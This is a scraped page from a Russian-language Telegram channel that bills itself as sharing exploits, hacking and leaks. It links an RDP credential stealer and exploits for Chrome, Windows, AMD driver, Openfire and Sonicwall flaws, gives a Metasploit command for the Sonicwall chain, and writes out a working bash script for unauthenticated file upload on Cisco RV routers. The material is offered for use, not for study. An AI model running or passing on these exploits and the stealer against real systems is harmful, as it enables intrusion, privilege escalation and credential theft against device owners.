Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Я календарь переверну
И снова RATник в сентябре
🔥22👍6😱2
RDP Credential Stealer
*
download
*
HowToUse

#win #rdp
👍10🔥3
Тревожные кадры, а еще там xmprpc есть
http://dramaalert.com/wp-includes/
👍10
CVE-2023-3079 google chrome
*
exploit
🔥1
Что, если вы запустите сканирование nmap и ВСЕ 65535 портов будут открыты?
-A PREROUTING -i eth0 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444 
Где 4444 HoneyPot, например.

#HA-HA
😱20👍10🔥8
dir-300 еще никогда не был так опасен 😀
🔥75😱18👍8
CVE-2023-20073
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><noscript>alert('JS-test')</noscript>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"

#cisco
👍14
Отслеживание интересной малвари для Linux (и UNIX).
Трэкнуть

#linux #malware
👍11😱1
OWASP Top 10 - video
*
download
🔥15👍2😱1
CVE-2023-36874 
уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.
*
POC exploit
*
Read - exploit for 0-day Windows Error Reporting Service bug
#windows #lpe
🔥9👍2
HITCON 2023
Демонстрация использования AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.
*
Exploit

#AMD
🔥7👍1
Sonicwall rce CVE-2023-34124
*
metasploit
*
use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124

ну да ну да 🙃
Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets
🔥5👍2
xss.is вы там это, аккуратнее )

https://xss.is/proxy.php?image=https%3A%2F%2Fdownloader.disk.yandex.ru%2Fpreview%2F8884af4bd817bbf0937c044879e6bf34afb2d95c1f14c493b4e39564fbdd2475%2F606426dc%2FmzcuBYol1Yb8wOc9K6NXQ_yNT_4nE1QLJw4LTWRpVOT5DDi0QJok4134hlurUPrtjlev1Ud-HWDKjiPFVQAMJw%253D%253D%3Fuid%3D0%26filename%3D%25D0%2590%25D0%25BD%25D0%25B0%25D0%25BB%25D0%25B8%25D0%25B7%2520%25D0%25B7%25D0%25B0%25D1%2589%25D0%25B8%25D1%2589%25D0%25B5%25D0%25BD%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D0%25B8%2520%25D0%25B1%25D0%25B5%25D1%2581%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25BD%25D1%258B%25D1%2585%2520%25D1%2581%25D0%25B5%25D1%2582%25D0%25B5%25D0%25B9.%2520%25D0%25A7%25D0%25B0%25D1%2581%25D1%2582%25D1%258C%25201.mp4%26disposition%3Dinline%26hash%3D%26limit%3D0%26content_type%3Dimage%252Fjpeg%26owner_uid%3D0%26tknv%3Dv2%26crop%3D1%26size%3D200x200&hash=35623f35aff8fe146f0dd9044667024d&return_error=1
😱36🔥21👍1
Exploitation of Openfire CVE-2023-32315
Full WriteUp
Openfire-Bypass exploit
👍12
Напоминаем, что завтра стартует конференция OffZone
Приходите, будет весело !

#offzone #moscow #it #cybersec #2023
👍7
Мы ж хотели тебя через забор перекинуть, давай !!!
🔥15👍6
Подготовка идёт)
🔥16😱3